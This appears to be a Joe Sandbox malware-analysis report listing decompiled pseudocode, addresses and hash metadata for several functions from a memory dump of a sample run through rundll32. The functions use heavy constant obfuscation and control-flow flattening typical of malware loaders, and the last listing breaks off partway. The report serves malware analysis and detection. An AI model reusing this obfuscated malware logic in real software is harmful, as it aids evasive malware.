                                                                                                                          0x007a4413
                                                                                                                          0x007a4413
                                                                                                                          0x007a4419
                                                                                                                          0x00000000
                                                                                                                          0x007a441f
                                                                                                                          0x007a4430
                                                                                                                          0x007a4434
                                                                                                                          0x007a4438
                                                                                                                          0x007a443d
                                                                                                                          0x007a4442
                                                                                                                          0x007a4448
                                                                                                                          0x00000000
                                                                                                                          0x007a4448
                                                                                                                          0x007a4442
                                                                                                                          0x007a4419
                                                                                                                          0x007a440d
                                                                                                                          0x007a4405
                                                                                                                          0x007a43f9
                                                                                                                          0x007a4535
                                                                                                                          0x007a453e
                                                                                                                          0x007a453e
                                                                                                                          0x007a44f1
                                                                                                                          0x007a44f6
                                                                                                                          0x007a44f7
                                                                                                                          0x007a44fc
                                                                                                                          0x007a44fc
                                                                                                                          0x007a44fc
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,a$`2$?
                                                                                                                          • API String ID: 0-2087061617
                                                                                                                          • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                          • Instruction ID: cb505531c94a9786cdc8c572963e492bd73d14484da32bdc3041f2619c5de8a8
                                                                                                                          • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                          • Instruction Fuzzy Hash: 50A112729083819FC758CF65C88A40FFBF1BBC5718F008A1DF59A96260D3B689098F46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007959F2 Relevance: 4.0, Strings: 3, Instructions: 202COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007959F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E00793C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E007ADA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E007ADCF7(_v1068, 0x791000, __eflags);
									_pop(_t222);
									_t209 =  *0x7b3e10; // 0x0
									_t237 =  *0x7b3e10; // 0x0
									E007947CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E0079A8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E007B13AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}










































                                                                                                                          0x007959f2
                                                                                                                          0x007959f8
                                                                                                                          0x00795a02
                                                                                                                          0x00795a0a
                                                                                                                          0x00795a0f
                                                                                                                          0x00795a1b
                                                                                                                          0x00795a1d
                                                                                                                          0x00795a21
                                                                                                                          0x00795a29
                                                                                                                          0x00795a31
                                                                                                                          0x00795a39
                                                                                                                          0x00795a41
                                                                                                                          0x00795a4d
                                                                                                                          0x00795a50
                                                                                                                          0x00795a54
                                                                                                                          0x00795a5c
                                                                                                                          0x00795a64
                                                                                                                          0x00795a74
                                                                                                                          0x00795a78
                                                                                                                          0x00795a80
                                                                                                                          0x00795a88
                                                                                                                          0x00795a8d
                                                                                                                          0x00795a99
                                                                                                                          0x00795a9e
                                                                                                                          0x00795aa4
                                                                                                                          0x00795aac
                                                                                                                          0x00795ab4
                                                                                                                          0x00795abc
                                                                                                                          0x00795ac4
                                                                                                                          0x00795acc
                                                                                                                          0x00795ad9
                                                                                                                          0x00795ada
                                                                                                                          0x00795ae3
                                                                                                                          0x00795ae7
                                                                                                                          0x00795aef
                                                                                                                          0x00795af7
                                                                                                                          0x00795aff
                                                                                                                          0x00795b07
                                                                                                                          0x00795b0f
                                                                                                                          0x00795b14
                                                                                                                          0x00795b1c
                                                                                                                          0x00795b24
                                                                                                                          0x00795b28
                                                                                                                          0x00795b30
                                                                                                                          0x00795b38
                                                                                                                          0x00795b40
                                                                                                                          0x00795b45
                                                                                                                          0x00795b4d
                                                                                                                          0x00795b55
                                                                                                                          0x00795b63
                                                                                                                          0x00795b67
                                                                                                                          0x00795b6f
                                                                                                                          0x00795b77
                                                                                                                          0x00795b84
                                                                                                                          0x00795b88
                                                                                                                          0x00795b95
                                                                                                                          0x00795b99
                                                                                                                          0x00795ba1
                                                                                                                          0x00795ba9
                                                                                                                          0x00795bae
                                                                                                                          0x00795bb6
                                                                                                                          0x00795bbe
                                                                                                                          0x00795bc8
                                                                                                                          0x00795bd5
                                                                                                                          0x00795be2
                                                                                                                          0x00795bea
                                                                                                                          0x00795bf2
                                                                                                                          0x00795bfa
                                                                                                                          0x00795c02
                                                                                                                          0x00795c0a
                                                                                                                          0x00795c12
                                                                                                                          0x00795c1a
                                                                                                                          0x00795c1f
                                                                                                                          0x00795c27
                                                                                                                          0x00795c2f
                                                                                                                          0x00795c34
                                                                                                                          0x00795c39
                                                                                                                          0x00795c41
                                                                                                                          0x00795c49
                                                                                                                          0x00795c57
                                                                                                                          0x00795c5a
                                                                                                                          0x00795c5e
                                                                                                                          0x00795c66
                                                                                                                          0x00795c6e
                                                                                                                          0x00795c76
                                                                                                                          0x00795c7e
                                                                                                                          0x00795c86
                                                                                                                          0x00795c8e
                                                                                                                          0x00795c96
                                                                                                                          0x00795ca3
                                                                                                                          0x00795ca7
                                                                                                                          0x00795caf
                                                                                                                          0x00795caf
                                                                                                                          0x00795cc1
                                                                                                                          0x00795dc8
                                                                                                                          0x00795cc7
                                                                                                                          0x00795cc9
                                                                                                                          0x00795d69
                                                                                                                          0x00795d6e
                                                                                                                          0x00795d71
                                                                                                                          0x00000000
                                                                                                                          0x00795ccf
                                                                                                                          0x00795cd1
                                                                                                                          0x00795ce3
                                                                                                                          0x00795cec
                                                                                                                          0x00795cf4
                                                                                                                          0x00795cfa
                                                                                                                          0x00795d05
                                                                                                                          0x00795d1c
                                                                                                                          0x00795d2f
                                                                                                                          0x00795d3e
                                                                                                                          0x00795d43
                                                                                                                          0x00795d46
                                                                                                                          0x00000000
                                                                                                                          0x00795cd3
                                                                                                                          0x00795cd9
                                                                                                                          0x00000000
                                                                                                                          0x00795cdf
                                                                                                                          0x00795cdf
                                                                                                                          0x00000000
                                                                                                                          0x00795cdf
                                                                                                                          0x00795cd9
                                                                                                                          0x00795cd1
                                                                                                                          0x00795cc9
                                                                                                                          0x00795dd0
                                                                                                                          0x00795ddc
                                                                                                                          0x00795ddc
                                                                                                                          0x00795d78
                                                                                                                          0x00795d80
                                                                                                                          0x00795d81
                                                                                                                          0x00795d90
                                                                                                                          0x00795d97
                                                                                                                          0x00795d9b
                                                                                                                          0x00795d9d
                                                                                                                          0x00795da0
                                                                                                                          0x00795da5
                                                                                                                          0x00795da5
                                                                                                                          0x00795da5
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: &($&($%.
                                                                                                                          • API String ID: 0-466442461
                                                                                                                          • Opcode ID: 1f7b4a5c09241f46f8527dfb220b149c8cb5143e6f5059b3aba9412a158e8085
                                                                                                                          • Instruction ID: 93e444edcfbef7523dc69a498842d0d73b188c5d415efac365bb5bac1a9359dc
                                                                                                                          • Opcode Fuzzy Hash: 1f7b4a5c09241f46f8527dfb220b149c8cb5143e6f5059b3aba9412a158e8085
                                                                                                                          • Instruction Fuzzy Hash: 50A120B11083819FCB58CF26D58941BFBF1FBC4758F108A1DF5A696220D7B98A09CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007B13AD Relevance: 3.9, Strings: 3, Instructions: 169COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007B13AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E00794B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E00794B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E00794B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E00793BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E00793BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E00794DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}









                                                                                                                          0x007b13ae
                                                                                                                          0x007b13b9
                                                                                                                          0x007b13be
                                                                                                                          0x007b13c1
                                                                                                                          0x007b13c4
                                                                                                                          0x007b13c5
                                                                                                                          0x007b13c6
                                                                                                                          0x007b13cb
                                                                                                                          0x007b13cf
                                                                                                                          0x007b13d3
                                                                                                                          0x007b13da
                                                                                                                          0x007b13e1
                                                                                                                          0x007b13e8
                                                                                                                          0x007b13ef
                                                                                                                          0x007b13f2
                                                                                                                          0x007b13f9
                                                                                                                          0x007b1404
                                                                                                                          0x007b140b
                                                                                                                          0x007b1412
                                                                                                                          0x007b1415
                                                                                                                          0x007b141c
                                                                                                                          0x007b1423
                                                                                                                          0x007b142a
                                                                                                                          0x007b1431
                                                                                                                          0x007b1438
                                                                                                                          0x007b143c
                                                                                                                          0x007b1440
                                                                                                                          0x007b1447
                                                                                                                          0x007b144e
                                                                                                                          0x007b1455
                                                                                                                          0x007b145c
                                                                                                                          0x007b1460
                                                                                                                          0x007b1467
                                                                                                                          0x007b146e
                                                                                                                          0x007b1475
                                                                                                                          0x007b147c
                                                                                                                          0x007b1483
                                                                                                                          0x007b148a
                                                                                                                          0x007b1491
                                                                                                                          0x007b1498
                                                                                                                          0x007b149f
                                                                                                                          0x007b14a6
                                                                                                                          0x007b14ad
                                                                                                                          0x007b14b4
                                                                                                                          0x007b14bb
                                                                                                                          0x007b14bf
                                                                                                                          0x007b14c6
                                                                                                                          0x007b14cd
                                                                                                                          0x007b14d4
                                                                                                                          0x007b14db
                                                                                                                          0x007b14e2
                                                                                                                          0x007b14e9
                                                                                                                          0x007b14f0
                                                                                                                          0x007b14f4
                                                                                                                          0x007b14f8
                                                                                                                          0x007b14ff
                                                                                                                          0x007b1506
                                                                                                                          0x007b1513
                                                                                                                          0x007b151a
                                                                                                                          0x007b1525
                                                                                                                          0x007b1528
                                                                                                                          0x007b152f
                                                                                                                          0x007b1536
                                                                                                                          0x007b153d
                                                                                                                          0x007b1544
                                                                                                                          0x007b1548
                                                                                                                          0x007b154f
                                                                                                                          0x007b1556
                                                                                                                          0x007b155a
                                                                                                                          0x007b1561
                                                                                                                          0x007b1568
                                                                                                                          0x007b156f
                                                                                                                          0x007b1576
                                                                                                                          0x007b157a
                                                                                                                          0x007b1581
                                                                                                                          0x007b158a
                                                                                                                          0x007b1591
                                                                                                                          0x007b159e
                                                                                                                          0x007b159f
                                                                                                                          0x007b15a2
                                                                                                                          0x007b15a6
                                                                                                                          0x007b15ad
                                                                                                                          0x007b15b4
                                                                                                                          0x007b15c0
                                                                                                                          0x007b15c3
                                                                                                                          0x007b15c6
                                                                                                                          0x007b15cd
                                                                                                                          0x007b15d4
                                                                                                                          0x007b15df
                                                                                                                          0x007b15e2
                                                                                                                          0x007b15e9
                                                                                                                          0x007b15f0
                                                                                                                          0x007b15f7
                                                                                                                          0x007b15fe
                                                                                                                          0x007b1609
                                                                                                                          0x007b160c
                                                                                                                          0x007b1613
                                                                                                                          0x007b1616
                                                                                                                          0x007b161b
                                                                                                                          0x007b161c
                                                                                                                          0x007b1629
                                                                                                                          0x007b1632
                                                                                                                          0x007b163f
                                                                                                                          0x007b1648
                                                                                                                          0x007b164d
                                                                                                                          0x007b1661
                                                                                                                          0x007b1666
                                                                                                                          0x007b167c
                                                                                                                          0x007b1684
                                                                                                                          0x007b1687
                                                                                                                          0x007b168d
                                                                                                                          0x007b1693
                                                                                                                          0x007b1696
                                                                                                                          0x007b169c
                                                                                                                          0x007b16b0
                                                                                                                          0x007b16ba
                                                                                                                          0x007b16c4
                                                                                                                          0x007b16cc

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !h$5M$d,
                                                                                                                          • API String ID: 0-3324333736
                                                                                                                          • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                          • Instruction ID: 6cea0ba61b7576c9411ad72cd5b7e731f54760e702a2d3d6256e6380863765ae
                                                                                                                          • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                          • Instruction Fuzzy Hash: FD91BCB141038C9BCF58CF65D98A9DE3FB1BB04358F509219FE2A96260D3B58999CF84
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007ADEDC Relevance: 3.9, Strings: 3, Instructions: 162COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007ADEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
